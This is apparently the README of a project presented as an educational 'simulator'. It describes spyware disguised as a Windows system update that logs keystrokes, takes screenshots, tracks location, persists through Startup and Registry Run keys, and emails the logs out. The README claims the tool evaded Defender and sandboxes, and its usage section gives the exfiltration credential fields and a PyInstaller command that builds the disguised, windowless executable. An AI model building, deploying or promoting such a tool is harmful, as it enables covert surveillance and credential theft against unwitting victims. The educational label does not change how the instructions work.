Fake-SystemUpdate-Malware-Simulator
Overview
This project simulates a stealth malware disguised as a fake Windows system update executable. The file uses a familiar Windows icon and filename to appear legitimate, while silently executing a payload in the background. It captures keystrokes, takes screenshots, and logs IP-based location information.
The goal of this project is to better understand common stealth and persistence techniques used in real-world malware.
Note: This project is intended purely for educational and cybersecurity portfolio purposes.
Features Disguised as a Windows system update executable (Windows icon, realistic filename). Keylogging of all typed input. Periodic screenshot capturing. IP based geolocation tracking. Stealth persistence via Windows Startup Folder, and Windows Registry Run Keys. During testing, the simulation ran without being immediately flagged or blocked inside cloud sandboxes Defender and gmail.
Components • payload.py main script that captures data and sends logs • windows.ico icon used to mimic a real Windows update
How It Works The file appears as SystemUpdate.exe with a Windows-style icon. When executed: • Keylogging, screenshot capture, and location tracking begin silently • Collected logs are saved in the AppData directory • If email credentials are configured, logs are sent out every 10 minutes • Persistence is added so the file runs again after reboot
How to use
Edit payload.py and replace the following:
SENDER_EMAIL = "your_dummy_email@gmail.com"
SENDER_PASSWORD = "your_app_password"
RECEIVER_EMAIL = "your_real_email@gmail.com"Note: You must enable App Passwords in your Google account and use that instead of your real password
Use PyInstaller to convert the Python file into an executable:
pyinstaller --noconsole --onefile --icon=windows.ico payload.py
Disclaimer
This project is for educational use only